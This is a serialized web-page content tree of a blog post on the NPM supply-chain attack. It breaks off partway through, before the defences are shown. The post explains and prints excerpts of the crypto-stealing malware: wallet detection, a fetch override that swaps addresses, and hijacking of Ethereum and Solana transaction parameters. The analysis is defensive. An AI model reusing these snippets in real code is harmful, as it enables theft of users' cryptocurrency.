ses-zk-to-protect-your-funds",{"_path":96878,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":96879,"description":96880,"date":96881,"author":13,"image":96882,"isFeatured":19,"onBlogPage":19,"tags":96884,"body":96887,"_type":2534,"_id":99312,"_source":2536,"_file":99313,"_stem":99314,"_extension":2539},"/blog/2025-09-13-how-to-survive-supply-chain-attacks","How to Survive Supply-Chain Attacks","The recent supply-chain attack on NPM showed how easily trusted dependencies can become delivery vectors for malware. Learn how the attack worked and practical defenses developers can implement to stay safe.","2025-09-13T12:00:00.000Z",{"src":96883,"width":17,"height":18},"/posts/supply-chain-attcks/title.png",[96885,96886],"npm","supply-chain",{"type":25,"children":96888,"toc":99295},[96889,96902,96907,96912,96918,96923,96931,97261,97269,97831,97839,98546,98552,98557,98563,98568,98573,98579,98584,98596,98601,98627,98714,98726,98751,98767,98772,98777,98983,99025,99030,99042,99048,99060,99102,99115,99195,99207,99220,99227,99238,99246,99252,99265,99270,99274,99279,99291],{"type":28,"tag":29,"props":96890,"children":96891},{},[96892,96894,96900],{"type":33,"value":96893},"The recent supply-chain attack on NPM sent shockwaves through the developer community and served as a stark reminder of the risks lurking within our dependencies. Malicious versions of widely used packages, including ",{"type":28,"tag":98,"props":96895,"children":96897},{"className":96896},[],[96898],{"type":33,"value":96899},"chalk",{"type":33,"value":96901},", were published containing sophisticated malware designed to steal cryptocurrency.",{"type":28,"tag":29,"props":96903,"children":96904},{},[96905],{"type":33,"value":96906},"This attack highlights a fundamental vulnerability in the open-source ecosystem: any package you install gets the same permissions as your own code, giving it a free pass to important resources such as cookies and the network stack.",{"type":28,"tag":29,"props":96908,"children":96909},{},[96910],{"type":33,"value":96911},"In this post, we'll break down how the malware worked and outline practical defenses developers can use, including Lavamoat, a tool already adopted by leaders in the web3 ecosystem.",{"type":28,"tag":63,"props":96913,"children":96915},{"id":96914},"qix-malware-how-it-worked",[96916],{"type":33,"value":96917},"Qix Malware: How It Worked",{"type":28,"tag":29,"props":96919,"children":96920},{},[96921],{"type":33,"value":96922},"The attacker published modified versions of packages with code designed to do three things:",{"type":28,"tag":455,"props":96924,"children":96925},{},[96926],{"type":28,"tag":459,"props":96927,"children":96928},{},[96929],{"type":33,"value":96930},"Detect crypto wallets: The malware checked for Ethereum wallets like MetaMask.",{"type":28,"tag":234,"props":96932,"children":96934},{"code":96933,"language":31017,"meta":7,"className":31015,"style":7},"async function checkethereumw() {\n  try {\n    const _0x124ed3 = await window.ethereum.request({\n      'method': \"eth_accounts\"\n    });\n    if (_0x124ed3.length > 0) {\n      runmask();\n      if (rund != 1) {\n        rund = 1;\n        neth = 1;\n        newdlocal();\n      }\n    } else if (rund != 1) {\n      rund = 1;\n      newdlocal();\n    }\n  }\n}\n",[96935],{"type":28,"tag":98,"props":96936,"children":96937},{"__ignoreMap":7},[96938,96958,96970,97014,97031,97038,97074,97086,97114,97134,97154,97166,97173,97208,97228,97240,97247,97254],{"type":28,"tag":116,"props":96939,"children":96940},{"class":245,"line":246},[96941,96945,96949,96954],{"type":28,"tag":116,"props":96942,"children":96943},{"style":376},[96944],{"type":33,"value":35771},{"type":28,"tag":116,"props":96946,"children":96947},{"style":376},[96948],{"type":33,"value":1058},{"type":28,"tag":116,"props":96950,"children":96951},{"style":282},[96952],{"type":33,"value":96953}," checkethereumw",{"type":28,"tag":116,"props":96955,"children":96956},{"style":266},[96957],{"type":33,"value":1068},{"type":28,"tag":116,"props":96959,"children":96960},{"class":245,"line":256},[96961,96966],{"type":28,"tag":116,"props":96962,"children":96963},{"style":260},[96964],{"type":33,"value":96965},"  try",{"type":28,"tag":116,"props":96967,"children":96968},{"style":266},[96969],{"type":33,"value":1291},{"type":28,"tag":116,"props":96971,"children":96972},{"class":245,"line":293},[96973,96977,96982,96986,96990,96994,96998,97002,97006,97010],{"type":28,"tag":116,"props":96974,"children":96975},{"style":376},[96976],{"type":33,"value":51286},{"type":28,"tag":116,"props":96978,"children":96979},{"style":272},[96980],{"type":33,"value":96981}," _0x124ed3",{"type":28,"tag":116,"props":96983,"children":96984},{"style":370},[96985],{"type":33,"value":2226},{"type":28,"tag":116,"props":96987,"children":96988},{"style":260},[96989],{"type":33,"value":35837},{"type":28,"tag":116,"props":96991,"children":96992},{"style":272},[96993],{"type":33,"value":31059},{"type":28,"tag":116,"props":96995,"children":96996},{"style":266},[96997],{"type":33,"value":141},{"type":28,"tag":116,"props":96999,"children":97000},{"style":272},[97001],{"type":33,"value":31068},{"type":28,"tag":116,"props":97003,"children":97004},{"style":266},[97005],{"type":33,"value":141},{"type":28,"tag":116,"props":97007,"children":97008},{"style":282},[97009],{"type":33,"value":31144},{"type":28,"tag":116,"props":97011,"children":97012},{"style":266},[97013],{"type":33,"value":14803},{"type":28,"tag":116,"props":97015,"children":97016},{"class":245,"line":361},[97017,97022,97026],{"type":28,"tag":116,"props":97018,"children":97019},{"style":563},[97020],{"type":33,"value":97021},"      'method'",{"type":28,"tag":116,"props":97023,"children":97024},{"style":272},[97025],{"type":33,"value":4160},{"type":28,"tag":116,"props":97027,"children":97028},{"style":563},[97029],{"type":33,"value":97030}," \"eth_accounts\"\n",{"type":28,"tag":116,"props":97032,"children":97033},{"class":245,"line":387},[97034],{"type":28,"tag":116,"props":97035,"children":97036},{"style":266},[97037],{"type":33,"value":31905},{"type":28,"tag":116,"props":97039,"children":97040},{"class":245,"line":400},[97041,97045,97049,97054,97058,97062,97066,97070],{"type":28,"tag":116,"props":97042,"children":97043},{"style":260},[97044],{"type":33,"value":11947},{"type":28,"tag":116,"props":97046,"children":97047},{"style":266},[97048],{"type":33,"value":269},{"type":28,"tag":116,"props":97050,"children":97051},{"style":272},[97052],{"type":33,"value":97053},"_0x124ed3",{"type":28,"tag":116,"props":97055,"children":97056},{"style":266},[97057],{"type":33,"value":141},{"type":28,"tag":116,"props":97059,"children":97060},{"style":272},[97061],{"type":33,"value":8176},{"type":28,"tag":116,"props":97063,"children":97064},{"style":370},[97065],{"type":33,"value":13860},{"type":28,"tag":116,"props":97067,"children":97068},{"style":350},[97069],{"type":33,"value":2718},{"type":28,"tag":116,"props":97071,"children":97072},{"style":266},[97073],{"type":33,"value":844},{"type":28,"tag":116,"props":97075,"children":97076},{"class":245,"line":614},[97077,97082],{"type":28,"tag":116,"props":97078,"children":97079},{"style":282},[97080],{"type":33,"value":97081},"      runmask",{"type":28,"tag":116,"props":97083,"children":97084},{"style":266},[97085],{"type":33,"value":1445},{"type":28,"tag":116,"props":97087,"children":97088},{"class":245,"line":631},[97089,97093,97097,97102,97106,97110],{"type":28,"tag":116,"props":97090,"children":97091},{"style":260},[97092],{"type":33,"value":2186},{"type":28,"tag":116,"props":97094,"children":97095},{"style":266},[97096],{"type":33,"value":269},{"type":28,"tag":116,"props":97098,"children":97099},{"style":272},[97100],{"type":33,"value":97101},"rund",{"type":28,"tag":116,"props":97103,"children":97104},{"style":370},[97105],{"type":33,"value":64006},{"type":28,"tag":116,"props":97107,"children":97108},{"style":350},[97109],{"type":33,"value":4192},{"type":28,"tag":116,"props":97111,"children":97112},{"style":266},[97113],{"type":33,"value":844},{"type":28,"tag":116,"props":97115,"children":97116},{"class":245,"line":665},[97117,97122,97126,97130],{"type":28,"tag":116,"props":97118,"children":97119},{"style":272},[97120],{"type":33,"value":97121},"        rund",{"type":28,"tag":116,"props":97123,"children":97124},{"style":370},[97125],{"type":33,"value":2226},{"type":28,"tag":116,"props":97127,"children":97128},{"style":350},[97129],{"type":33,"value":4192},{"type":28,"tag":116,"props":97131,"children":97132},{"style":266},[97133],{"type":33,"value":384},{"type":28,"tag":116,"props":97135,"children":97136},{"class":245,"line":713},[97137,97142,97146,97150],{"type":28,"tag":116,"props":97138,"children":97139},{"style":272},[97140],{"type":33,"value":97141},"        neth",{"type":28,"tag":116,"props":97143,"children":97144},{"style":370},[97145],{"type":33,"value":2226},{"type":28,"tag":116,"props":97147,"children":97148},{"style":350},[97149],{"type":33,"value":4192},{"type":28,"tag":116,"props":97151,"children":97152},{"style":266},[97153],{"type":33,"value":384},{"type":28,"tag":116,"props":97155,"children":97156},{"class":245,"line":750},[97157,97162],{"type":28,"tag":116,"props":97158,"children":97159},{"style":282},[97160],{"type":33,"value":97161},"        newdlocal",{"type":28,"tag":116,"props":97163,"children":97164},{"style":266},[97165],{"type":33,"value":1445},{"type":28,"tag":116,"props":97167,"children":97168},{"class":245,"line":779},[97169],{"type":28,"tag":116,"props":97170,"children":97171},{"style":266},[97172],{"type":33,"value":2444},{"type":28,"tag":116,"props":97174,"children":97175},{"class":245,"line":796},[97176,97180,97184,97188,97192,97196,97200,97204],{"type":28,"tag":116,"props":97177,"children":97178},{"style":266},[97179],{"type":33,"value":15440},{"type":28,"tag":116,"props":97181,"children":97182},{"style":260},[97183],{"type":33,"value":2986},{"type":28,"tag":116,"props":97185,"children":97186},{"style":260},[97187],{"type":33,"value":15449},{"type":28,"tag":116,"props":97189,"children":97190},{"style":266},[97191],{"type":33,"value":269},{"type":28,"tag":116,"props":97193,"children":97194},{"style":272},[97195],{"type":33,"value":97101},{"type":28,"tag":116,"props":97197,"children":97198},{"style":370},[97199],{"type":33,"value":64006},{"type":28,"tag":116,"props":97201,"children":97202},{"style":350},[97203],{"type":33,"value":4192},{"type":28,"tag":116,"props":97205,"children":97206},{"style":266},[97207],{"type":33,"value":844},{"type":28,"tag":116,"props":97209,"children":97210},{"class":245,"line":847},[97211,97216,97220,97224],{"type":28,"tag":116,"props":97212,"children":97213},{"style":272},[97214],{"type":33,"value":97215},"      rund",{"type":28,"tag":116,"props":97217,"children":97218},{"style":370},[97219],{"type":33,"value":2226},{"type":28,"tag":116,"props":97221,"children":97222},{"style":350},[97223],{"type":33,"value":4192},{"type":28,"tag":116,"props":97225,"children":97226},{"style":266},[97227],{"type":33,"value":384},{"type":28,"tag":116,"props":97229,"children":97230},{"class":245,"line":898},[97231,97236],{"type":28,"tag":116,"props":97232,"children":97233},{"style":282},[97234],{"type":33,"value":97235},"      newdlocal",{"type":28,"tag":116,"props":97237,"children":97238},{"style":266},[97239],{"type":33,"value":1445},{"type":28,"tag":116,"props":97241,"children":97242},{"class":245,"line":907},[97243],{"type":28,"tag":116,"props":97244,"children":97245},{"style":266},[97246],{"type":33,"value":3025},{"type":28,"tag":116,"props":97248,"children":97249},{"class":245,"line":981},[97250],{"type":28,"tag":116,"props":97251,"children":97252},{"style":266},[97253],{"type":33,"value":5543},{"type":28,"tag":116,"props":97255,"children":97256},{"class":245,"line":1011},[97257],{"type":28,"tag":116,"props":97258,"children":97259},{"style":266},[97260],{"type":33,"value":406},{"type":28,"tag":455,"props":97262,"children":97263},{"start":256},[97264],{"type":28,"tag":459,"props":97265,"children":97266},{},[97267],{"type":33,"value":97268},"Intercept HTTP requests/responses and replace blockchain addresses with the attacker's wallet: (modified code for better understanding)",{"type":28,"tag":234,"props":97270,"children":97272},{"code":97271,"language":31017,"meta":7,"className":31015,"style":7},"fetch = async function (...args) {\n  const originalResponse = await originalFetch.call(this, ...args);\n  const contentType = originalResponse.headers.get('Content-Type') || '';\n  let data;\n  if (contentType.includes('application/json')) {\n    data = await originalResponse.clone().json();\n  } else {\n    data = await originalResponse.clone().text();\n  }\n  const processedData = replaceAddresses(data);\n  const finalResponseText =\n    typeof processedData === 'string' ? processedData : JSON.stringify(processedData);\n  const finalResponse = new Response(finalResponseText, {\n    status: originalResponse.status,\n    statusText: originalResponse.statusText,\n    headers: originalResponse.headers,\n  });\n  return finalResponse;\n};\n",[97273],{"type":28,"tag":98,"props":97274,"children":97275},{"__ignoreMap":7},[97276,97311,97368,97430,97445,97482,97521,97536,97575,97582,97615,97631,97689,97727,97752,97777,97801,97809,97824],{"type":28,"tag":116,"props":97277,"children":97278},{"class":245,"line":246},[97279,97283,97287,97291,97295,97299,97303,97307],{"type":28,"tag":116,"props":97280,"children":97281},{"style":282},[97282],{"type":33,"value":33729},{"type":28,"tag":116,"props":97284,"children":97285},{"style":370},[97286],{"type":33,"value":2226},{"type":28,"tag":116,"props":97288,"children":97289},{"style":376},[97290],{"type":33,"value":35990},{"type":28,"tag":116,"props":97292,"children":97293},{"style":376},[97294],{"type":33,"value":1058},{"type":28,"tag":116,"props":97296,"children":97297},{"style":266},[97298],{"type":33,"value":269},{"type":28,"tag":116,"props":97300,"children":97301},{"style":370},[97302],{"type":33,"value":9259},{"type":28,"tag":116,"props":97304,"children":97305},{"style":272},[97306],{"type":33,"value":37850},{"type":28,"tag":116,"props":97308,"children":97309},{"style":266},[97310],{"type":33,"value":844},{"type":28,"tag":116,"props":97312,"children":97313},{"class":245,"line":256},[97314,97318,97323,97327,97331,97336,97340,97344,97348,97352,97356,97360,97364],{"type":28,"tag":116,"props":97315,"children":97316},{"style":376},[97317],{"type":33,"value":35814},{"type":28,"tag":116,"props":97319,"children":97320},{"style":272},[97321],{"type":33,"value":97322}," originalResponse",{"type":28,"tag":116,"props":97324,"children":97325},{"style":370},[97326],{"type":33,"value":2226},{"type":28,"tag":116,"props":97328,"children":97329},{"style":260},[97330],{"type":33,"value":35837},{"type":28,"tag":116,"props":97332,"children":97333},{"style":272},[97334],{"type":33,"value":97335}," originalFetch",{"type":28,"tag":116,"props":97337,"children":97338},{"style":266},[97339],{"type":33,"value":141},{"type":28,"tag":116,"props":97341,"children":97342},{"style":282},[97343],{"type":33,"value":37918},{"type":28,"tag":116,"props":97345,"children":97346},{"style":266},[97347],{"type":33,"value":313},{"type":28,"tag":116,"props":97349,"children":97350},{"style":376},[97351],{"type":33,"value":17355},{"type":28,"tag":116,"props":97353,"children":97354},{"style":266},[97355],{"type":33,"value":825},{"type":28,"tag":116,"props":97357,"children":97358},{"style":370},[97359],{"type":33,"value":9259},{"type":28,"tag":116,"props":97361,"children":97362},{"style":272},[97363],{"type":33,"value":37850},{"type":28,"tag":116,"props":97365,"children":97366},{"style":266},[97367],{"type":33,"value":895},{"type":28,"tag":116,"props":97369,"children":97370},{"class":245,"line":293},[97371,97375,97380,97384,97388,97392,97397,97401,97405,97409,97414,97418,97422,97426],{"type":28,"tag":116,"props":97372,"children":97373},{"style":376},[97374],{"type":33,"value":35814},{"type":28,"tag":116,"props":97376,"children":97377},{"style":272},[97378],{"type":33,"value":97379}," contentType",{"type":28,"tag":116,"props":97381,"children":97382},{"style":370},[97383],{"type":33,"value":2226},{"type":28,"tag":116,"props":97385,"children":97386},{"style":272},[97387],{"type":33,"value":97322},{"type":28,"tag":116,"props":97389,"children":97390},{"style":266},[97391],{"type":33,"value":141},{"type":28,"tag":116,"props":97393,"children":97394},{"style":272},[97395],{"type":33,"value":97396},"headers",{"type":28,"tag":116,"props":97398,"children":97399},{"style":266},[97400],{"type":33,"value":141},{"type":28,"tag":116,"props":97402,"children":97403},{"style":282},[97404],{"type":33,"value":16013},{"type":28,"tag":116,"props":97406,"children":97407},{"style":266},[97408],{"type":33,"value":313},{"type":28,"tag":116,"props":97410,"children":97411},{"style":563},[97412],{"type":33,"value":97413},"'Content-Type'",{"type":28,"tag":116,"props":97415,"children":97416},{"style":266},[97417],{"type":33,"value":1609},{"type":28,"tag":116,"props":97419,"children":97420},{"style":370},[97421],{"type":33,"value":22081},{"type":28,"tag":116,"props":97423,"children":97424},{"style":563},[97425],{"type":33,"value":31488},{"type":28,"tag":116,"props":97427,"children":97428},{"style":266},[97429],{"type":33,"value":384},{"type":28,"tag":116,"props":97431,"children":97432},{"class":245,"line":361},[97433,97437,97441],{"type":28,"tag":116,"props":97434,"children":97435},{"style":376},[97436],{"type":33,"value":7527},{"type":28,"tag":116,"props":97438,"children":97439},{"style":272},[97440],{"type":33,"value":14768},{"type":28,"tag":116,"props":97442,"children":97443},{"style":266},[97444],{"type":33,"value":384},{"type":28,"tag":116,"props":97446,"children":97447},{"class":245,"line":387},[97448,97452,97456,97461,97465,97469,97473,97478],{"type":28,"tag":116,"props":97449,"children":97450},{"style":260},[97451],{"type":33,"value":31045},{"type":28,"tag":116,"props":97453,"children":97454},{"style":266},[97455],{"type":33,"value":269},{"type":28,"tag":116,"props":97457,"children":97458},{"style":272},[97459],{"type":33,"value":97460},"contentType",{"type":28,"tag":116,"props":97462,"children":97463},{"style":266},[97464],{"type":33,"value":141},{"type":28,"tag":116,"props":97466,"children":97467},{"style":282},[97468],{"type":33,"value":34807},{"type":28,"tag":116,"props":97470,"children":97471},{"style":266},[97472],{"type":33,"value":313},{"type":28,"tag":116,"props":97474,"children":97475},{"style":563},[97476],{"type":33,"value":97477},"'application/json'",{"type":28,"tag":116,"props":97479,"children":97480},{"style":266},[97481],{"type":33,"value":34820},{"type":28,"tag":116,"props":97483,"children":97484},{"class":245,"line":400},[97485,97489,97493,97497,97501,97505,97509,97513,97517],{"type":28,"tag":116,"props":97486,"children":97487},{"style":272},[97488],{"type":33,"value":42853},{"type":28,"tag":116,"props":97490,"children":97491},{"style":370},[97492],{"type":33,"value":2226},{"type":28,"tag":116,"props":97494,"children":97495},{"style":260},[97496],{"type":33,"value":35837},{"type":28,"tag":116,"props":97498,"children":97499},{"style":272},[97500],{"type":33,"value":97322},{"type":28,"tag":116,"props":97502,"children":97503},{"style":266},[97504],{"type":33,"value":141},{"type":28,"tag":116,"props":97506,"children":97507},{"style":282},[97508],{"type":33,"value":15083},{"type":28,"tag":116,"props":97510,"children":97511},{"style":266},[97512],{"type":33,"value":1540},{"type":28,"tag":116,"props":97514,"children":97515},{"style":282},[97516],{"type":33,"value":33632},{"type":28,"tag":116,"props":97518,"children":97519},{"style":266},[97520],{"type":33,"value":1445},{"type":28,"tag":116,"props":97522,"children":97523},{"class":245,"line":614},[97524,97528,97532],{"type":28,"tag":116,"props":97525,"children":97526},{"style":266},[97527],{"type":33,"value":31119},{"type":28,"tag":116,"props":97529,"children":97530},{"style":260},[97531],{"type":33,"value":2986},{"type":28,"tag":116,"props":97533,"children":97534},{"style":266},[97535],{"type":33,"value":1291},{"type":28,"tag":116,"props":97537,"children":97538},{"class":245,"line":631},[97539,97543,97547,97551,97555,97559,97563,97567,97571],{"type":28,"tag":116,"props":97540,"children":97541},{"style":272},[97542],{"type":33,"value":42853},{"type":28,"tag":116,"props":97544,"children":97545},{"style":370},[97546],{"type":33,"value":2226},{"type":28,"tag":116,"props":97548,"children":97549},{"style":260},[97550],{"type":33,"value":35837},{"type":28,"tag":116,"props":97552,"children":97553},{"style":272},[97554],{"type":33,"value":97322},{"type":28,"tag":116,"props":97556,"children":97557},{"style":266},[97558],{"type":33,"value":141},{"type":28,"tag":116,"props":97560,"children":97561},{"style":282},[97562],{"type":33,"value":15083},{"type":28,"tag":116,"props":97564,"children":97565},{"style":266},[97566],{"type":33,"value":1540},{"type":28,"tag":116,"props":97568,"children":97569},{"style":282},[97570],{"type":33,"value":33},{"type":28,"tag":116,"props":97572,"children":97573},{"style":266},[97574],{"type":33,"value":1445},{"type":28,"tag":116,"props":97576,"children":97577},{"class":245,"line":665},[97578],{"type":28,"tag":116,"props":97579,"children":97580},{"style":266},[97581],{"type":33,"value":5543},{"type":28,"tag":116,"props":97583,"children":97584},{"class":245,"line":713},[97585,97589,97594,97598,97603,97607,97611],{"type":28,"tag":116,"props":97586,"children":97587},{"style":376},[97588],{"type":33,"value":35814},{"type":28,"tag":116,"props":97590,"children":97591},{"style":272},[97592],{"type":33,"value":97593}," processedData",{"type":28,"tag":116,"props":97595,"children":97596},{"style":370},[97597],{"type":33,"value":2226},{"type":28,"tag":116,"props":97599,"children":97600},{"style":282},[97601],{"type":33,"value":97602}," replaceAddresses",{"type":28,"tag":116,"props":97604,"children":97605},{"style":266},[97606],{"type":33,"value":313},{"type":28,"tag":116,"props":97608,"children":97609},{"style":272},[97610],{"type":33,"value":3372},{"type":28,"tag":116,"props":97612,"children":97613},{"style":266},[97614],{"type":33,"value":895},{"type":28,"tag":116,"props":97616,"children":97617},{"class":245,"line":750},[97618,97622,97627],{"type":28,"tag":116,"props":97619,"children":97620},{"style":376},[97621],{"type":33,"value":35814},{"type":28,"tag":116,"props":97623,"children":97624},{"style":272},[97625],{"type":33,"value":97626}," finalResponseText",{"type":28,"tag":116,"props":97628,"children":97629},{"style":370},[97630],{"type":33,"value":35481},{"type":28,"tag":116,"props":97632,"children":97633},{"class":245,"line":779},[97634,97639,97643,97647,97652,97656,97660,97664,97668,97672,97676,97680,97685],{"type":28,"tag":116,"props":97635,"children":97636},{"style":376},[97637],{"type":33,"value":97638},"    typeof",{"type":28,"tag":116,"props":97640,"children":97641},{"style":272},[97642],{"type":33,"value":97593},{"type":28,"tag":116,"props":97644,"children":97645},{"style":370},[97646],{"type":33,"value":31073},{"type":28,"tag":116,"props":97648,"children":97649},{"style":563},[97650],{"type":33,"value":97651}," 'string'",{"type":28,"tag":116,"props":97653,"children":97654},{"style":370},[97655],{"type":33,"value":2349},{"type":28,"tag":116,"props":97657,"children":97658},{"style":272},[97659],{"type":33,"value":97593},{"type":28,"tag":116,"props":97661,"children":97662},{"style":370},[97663],{"type":33,"value":2358},{"type":28,"tag":116,"props":97665,"children":97666},{"style":272},[97667],{"type":33,"value":37151},{"type":28,"tag":116,"props":97669,"children":97670},{"style":266},[97671],{"type":33,"value":141},{"type":28,"tag":116,"props":97673,"children":97674},{"style":282},[97675],{"type":33,"value":38854},{"type":28,"tag":116,"props":97677,"children":97678},{"style":266},[97679],{"type":33,"value":313},{"type":28,"tag":116,"props":97681,"children":97682},{"style":272},[97683],{"type":33,"value":97684},"processedData",{"type":28,"tag":116,"props":97686,"children":97687},{"style":266},[97688],{"type":33,"value":895},{"type":28,"tag":116,"props":97690,"children":97691},{"class":245,"line":796},[97692,97696,97701,97705,97709,97714,97718,97723],{"type":28,"tag":116,"props":97693,"children":97694},{"style":376},[97695],{"type":33,"value":35814},{"type":28,"tag":116,"props":97697,"children":97698},{"style":272},[97699],{"type":33,"value":97700}," finalResponse",{"type":28,"tag":116,"props":97702,"children":97703},{"style":370},[97704],{"type":33,"value":2226},{"type":28,"tag":116,"props":97706,"children":97707},{"style":376},[97708],{"type":33,"value":31582},{"type":28,"tag":116,"props":97710,"children":97711},{"style":282},[97712],{"type":33,"value":97713}," Response",{"type":28,"tag":116,"props":97715,"children":97716},{"style":266},[97717],{"type":33,"value":313},{"type":28,"tag":116,"props":97719,"children":97720},{"style":272},[97721],{"type":33,"value":97722},"finalResponseText",{"type":28,"tag":116,"props":97724,"children":97725},{"style":266},[97726],{"type":33,"value":48503},{"type":28,"tag":116,"props":97728,"children":97729},{"class":245,"line":847},[97730,97735,97739,97743,97748],{"type":28,"tag":116,"props":97731,"children":97732},{"style":272},[97733],{"type":33,"value":97734},"    status:",{"type":28,"tag":116,"props":97736,"children":97737},{"style":272},[97738],{"type":33,"value":97322},{"type":28,"tag":116,"props":97740,"children":97741},{"style":266},[97742],{"type":33,"value":141},{"type":28,"tag":116,"props":97744,"children":97745},{"style":272},[97746],{"type":33,"value":97747},"status",{"type":28,"tag":116,"props":97749,"children":97750},{"style":266},[97751],{"type":33,"value":3178},{"type":28,"tag":116,"props":97753,"children":97754},{"class":245,"line":898},[97755,97760,97764,97768,97773],{"type":28,"tag":116,"props":97756,"children":97757},{"style":272},[97758],{"type":33,"value":97759},"    statusText:",{"type":28,"tag":116,"props":97761,"children":97762},{"style":272},[97763],{"type":33,"value":97322},{"type":28,"tag":116,"props":97765,"children":97766},{"style":266},[97767],{"type":33,"value":141},{"type":28,"tag":116,"props":97769,"children":97770},{"style":272},[97771],{"type":33,"value":97772},"statusText",{"type":28,"tag":116,"props":97774,"children":97775},{"style":266},[97776],{"type":33,"value":3178},{"type":28,"tag":116,"props":97778,"children":97779},{"class":245,"line":907},[97780,97785,97789,97793,97797],{"type":28,"tag":116,"props":97781,"children":97782},{"style":272},[97783],{"type":33,"value":97784},"    headers:",{"type":28,"tag":116,"props":97786,"children":97787},{"style":272},[97788],{"type":33,"value":97322},{"type":28,"tag":116,"props":97790,"children":97791},{"style":266},[97792],{"type":33,"value":141},{"type":28,"tag":116,"props":97794,"children":97795},{"style":272},[97796],{"type":33,"value":97396},{"type":28,"tag":116,"props":97798,"children":97799},{"style":266},[97800],{"type":33,"value":3178},{"type":28,"tag":116,"props":97802,"children":97803},{"class":245,"line":981},[97804],{"type":28,"tag":116,"props":97805,"children":97806},{"style":266},[97807],{"type":33,"value":97808},"  });\n",{"type":28,"tag":116,"props":97810,"children":97811},{"class":245,"line":1011},[97812,97816,97820],{"type":28,"tag":116,"props":97813,"children":97814},{"style":260},[97815],{"type":33,"value":38820},{"type":28,"tag":116,"props":97817,"children":97818},{"style":272},[97819],{"type":33,"value":97700},{"type":28,"tag":116,"props":97821,"children":97822},{"style":266},[97823],{"type":33,"value":384},{"type":28,"tag":116,"props":97825,"children":97826},{"class":245,"line":1029},[97827],{"type":28,"tag":116,"props":97828,"children":97829},{"style":266},[97830],{"type":33,"value":16239},{"type":28,"tag":455,"props":97832,"children":97833},{"start":293},[97834],{"type":28,"tag":459,"props":97835,"children":97836},{},[97837],{"type":33,"value":97838},"The malware intercepted wallet requests and silently replaced the receiver address with the attacker address. Instead of a blunt substitution, it used the Levenshtein distance algorithm to pick a lookalike address, which made it harder for victims to notice funds being siphoned.",{"type":28,"tag":234,"props":97840,"children":97842},{"code":97841,"language":31017,"meta":7,"className":31015,"style":7},"if (_0x2c3d7e.method === 'eth_sendTransaction' && _0x2c3d7e.params && _0x2c3d7e.params[0]) {\n  try {\n    const _0x39ad21 = _0x1089ae(_0x2c3d7e.params[0], true);\n    _0x2c3d7e.params[0] = _0x39ad21;\n  } catch (_0x226343) {}\n} else {\n  if (\n    (_0x2c3d7e.method === 'solana_signTransaction' ||\n      _0x2c3d7e.method === 'solana_signAndSendTransaction') &&\n    _0x2c3d7e.params &&\n    _0x2c3d7e.params[0]\n  ) {\n    try {\n      let _0x5ad975 = _0x2c3d7e.params[0];\n      if (_0x5ad975.transaction) {\n        _0x5ad975 = _0x5ad975.transaction;\n      }\n      const _0x5dbe63 = _0x1089ae(_0x5ad975, false);\n      if (_0x2c3d7e.params[0].transaction) {\n        _0x2c3d7e.params[0].transaction = _0x5dbe63;\n      } else {\n        _0x2c3d7e.params[0] = _0x5dbe63;\n      }\n    } catch (_0x4b99fd) {}\n  }\n}\n",[97843],{"type":28,"tag":98,"props":97844,"children":97845},{"__ignoreMap":7},[97846,97925,97936,97993,98033,98058,98073,98084,98118,98151,98170,98197,98205,98216,98256,98285,98313,98320,98360,98403,98447,98462,98501,98508,98532,98539],{"type":28,"tag":116,"props":97847,"children":97848},{"class":245,"line":246},[97849,97853,97857,97862,97866,97870,97874,97879,97883,97888,97892,97897,97901,97905,97909,97913,97917,97921],{"type":28,"tag":116,"props":97850,"children":97851},{"style":260},[97852],{"type":33,"value":263},{"type":28,"tag":116,"props":97854,"children":97855},{"style":266},[97856],{"type":33,"value":269},{"type":28,"tag":116,"props":97858,"children":97859},{"style":272},[97860],{"type":33,"value":97861},"_0x2c3d7e",{"type":28,"tag":116,"props":97863,"children":97864},{"style":266},[97865],{"type":33,"value":141},{"type":28,"tag":116,"props":97867,"children":97868},{"style":272},[97869],{"type":33,"value":37935},{"type":28,"tag":116,"props":97871,"children":97872},{"style":370},[97873],{"type":33,"value":31073},{"type":28,"tag":116,"props":97875,"children":97876},{"style":563},[97877],{"type":33,"value":97878}," 'eth_sendTransaction'",{"type":28,"tag":116,"props":97880,"children":97881},{"style":370},[97882],{"type":33,"value":13851},{"type":28,"tag":116,"props":97884,"children":97885},{"style":272},[97886],{"type":33,"value":97887}," _0x2c3d7e",{"type":28,"tag":116,"props":97889,"children":97890},{"style":266},[97891],{"type":33,"value":141},{"type":28,"tag":116,"props":97893,"children":97894},{"style":272},[97895],{"type":33,"value":97896},"params",{"type":28,"tag":116,"props":97898,"children":97899},{"style":370},[97900],{"type":33,"value":13851},{"type":28,"tag":116,"props":97902,"children":97903},{"style":272},[97904],{"type":33,"value":97887},{"type":28,"tag":116,"props":97906,"children":97907},{"style":266},[97908],{"type":33,"value":141},{"type":28,"tag":116,"props":97910,"children":97911},{"style":272},[97912],{"type":33,"value":97896},{"type":28,"tag":116,"props":97914,"children":97915},{"style":266},[97916],{"type":33,"value":347},{"type":28,"tag":116,"props":97918,"children":97919},{"style":350},[97920],{"type":33,"value":353},{"type":28,"tag":116,"props":97922,"children":97923},{"style":266},[97924],{"type":33,"value":40244},{"type":28,"tag":116,"props":97926,"children":97927},{"class":245,"line":256},[97928,97932],{"type":28,"tag":116,"props":97929,"children":97930},{"style":260},[97931],{"type":33,"value":96965},{"type":28,"tag":116,"props":97933,"children":97934},{"style":266},[97935],{"type":33,"value":1291},{"type":28,"tag":116,"props":97937,"children":97938},{"class":245,"line":293},[97939,97943,97948,97952,97957,97961,97965,97969,97973,97977,97981,97985,97989],{"type":28,"tag":116,"props":97940,"children":97941},{"style":376},[97942],{"type":33,"value":51286},{"type":28,"tag":116,"props":97944,"children":97945},{"style":272},[97946],{"type":33,"value":97947}," _0x39ad21",{"type":28,"tag":116,"props":97949,"children":97950},{"style":370},[97951],{"type":33,"value":2226},{"type":28,"tag":116,"props":97953,"children":97954},{"style":282},[97955],{"type":33,"value":97956}," 